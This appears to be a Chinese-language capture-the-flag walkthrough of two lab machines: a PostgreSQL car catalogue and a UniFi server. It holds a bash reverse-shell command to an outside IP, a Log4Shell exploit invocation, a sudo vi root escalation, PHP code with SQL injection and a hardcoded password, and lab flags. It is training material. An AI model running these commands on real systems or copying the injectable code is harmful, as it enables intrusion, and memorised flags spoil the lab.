do you want to retrieve the command standard output? [Y/n/a]

[15:45:33] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[15:45:37] [INFO] retrieved: 'postgres'
command standard output: 'postgres'

反弹shell,弹到tun0网卡上

os-shell> bash -c "bash -i &> /dev/tcp/10.10.16.23/8888 0>&1"

image-20250104155728644

可以执行如下提高交互性

 python3 -c 'import pty;pty.spawn("/bin/bash")'
 [CTRL+Z]
 stty raw -echo
 fg
 export TERM=xterm

提权

在/var/www/html/dashboard.php中找到数据库密码P@s5w0rd!

<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>Admin Dashboard</title>
  <link rel="stylesheet" href="./dashboard.css">
  <script src="https://use.fontawesome.com/33a3739634.js"></script>

</head>
<body>
<!-- partial:index.partial.html -->
<body>
 <div id="wrapper">
 <div class="parent">
  <h1 align="left">MegaCorp Car Catalogue</h1>
<form action="" method="GET">
<div class="search-box">
  <input type="search" name="search" placeholder="Search" />
  <button type="submit" class="search-btn"><i class="fa fa-search"></i></button>
</div>
</form>
  </div>

  <table id="keywords" cellspacing="0" cellpadding="0">
    <thead>
      <tr>
        <th><span style="color: white">Name</span></th>
        <th><span style="color: white">Type</span></th>
        <th><span style="color: white">Fuel</span></th>
        <th><span style="color: white">Engine</span></th>
      </tr>
    </thead>
    <tbody>
        <?php
        session_start();
        if($_SESSION['login'] !== "true") {
          header("Location: index.php");
          die();
        }
        try {
          $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
        }

        catch ( exception $e ) {
          echo $e->getMessage();
        }

        if(isset($_REQUEST['search'])) {

          $q = "Select * from cars where name ilike '%". $_REQUEST["search"] ."%'";

          $result = pg_query($conn,$q);

          if (!$result)
          {
                            die(pg_last_error($conn));
          }
          while($row = pg_fetch_array($result, NULL, PGSQL_NUM))
              {
                echo "
                  <tr>
                    <td class='lalign'>$row[1]</td>
                    <td>$row[2]</td>
                    <td>$row[3]</td>
                    <td>$row[4]</td>
                  </tr>";
            }
        }
        else {

          $q = "Select * from cars";

          $result = pg_query($conn,$q);

          if (!$result)
          {
                            die(pg_last_error($conn));
          }
          while($row = pg_fetch_array($result, NULL, PGSQL_NUM))
              {
                echo "
                  <tr>
                    <td class='lalign'>$row[1]</td>
                    <td>$row[2]</td>
                    <td>$row[3]</td>
                    <td>$row[4]</td>
                  </tr>";
            }
        }


      ?>
    </tbody>
  </table>
 </div>
</body>
<!-- partial -->
  <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery.tablesorter/2.28.14/js/jquery.tablesorter.min.js'></script><script  src="./dashboard.js"></script>

</body>
</html>

拿到postgres用户的密码,可以ssh连接

image-20250104164313955

sudo -l

image-20250104164427302

可以发现我们可以sudo执行/bin/vi /etc/postgresql/11/main/pg_hba.conf

image-20250104164214369

image-20250104164214369

Submit Flag

Submit user flag

ec9b13ca4d6229cd5cc1e09980965bf7

Submit Flag

Submit root flag

sudo进入vi执行:!sh可以拿到root用户shell

image-20250104164948268

image-20250104165252144

dd6e058e814260bc70e9bbdef2715849

Unified

Task 1

Which are the first four open ports?

前四个开放端口是哪一个?

22,6789,8080,8443

image-20250104174109666

Task 2

What is the title of the software that is running running on port 8443?

在端口 8443 上运行的软件的标题是什么?

Unifi Network

image-20250104180422472

Task 3

What is the version of the software that is running?

正在运行的软件版本是什么?

6.4.54

image-20250104180600296

Task 4

What is the CVE for the identified vulnerability?

已识别漏洞的 CVE 是什么?

CVE-2021-44228

Task 5

What protocol does JNDI leverage in the injection?

JNDI 在注入中使用什么协议?

LDAP

puzzlepeaches/Log4jUnifi: Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more.

python exploit.py -u https://10.129.96.149:8443 -i 10.10.16.23 -p 8888

image-20250104190343975

Task 6

What tool do we use to intercept the traffic, indicating the attack was successful?

我们使用什么工具来拦截流量,表明攻击成功?

tcpdump

Task 7

What port do we need to inspect intercepted traffic for?

我们需要检查拦截的流量的哪个端口?

389

Task 8

What port is the MongoDB service running on?

MongoDB 服务在哪个端口上运行?

27117

image-20250104214437869

Task 9

What is the default database name for UniFi applications?

UniFi 应用程序的默认数据库名称是什么?

image-20250104220631232

Task 10

What is the function we use to enumerate users within the database in MongoDB?

我们在 MongoDB 中用来枚举数据库中的用户的函数是什么?

db.admin.find()

Task 11

What is the function we use to update users within the database in MongoDB?

我们在 MongoDB 中更新数据库内用户的函数是什么?

db.admin.update()

Task 12

What is the password for the root user?

root 用户的密码是什么?

可以查到administrator用户的密码hash值,但难以破解

image-20250104225240493

好在可以更新shadow,hash值为SHA-512加密

image-20250104224832935

mkpasswd生成hash值

image-20250104225025451

image-20250104230607695

账号administrator,密码n0o0b登入,查看setting可以找到ssh信息root:NotACrackablePassword4U2022

image-20250104233222519

Submit Flag

Submit user flag

image-20250104233445010

6ced1a6a89e666c0620cdb10262ba127

Submit Flag

Submit root flag

image-20250104233549745

e50bc93c75b634e4b272d2f771c33681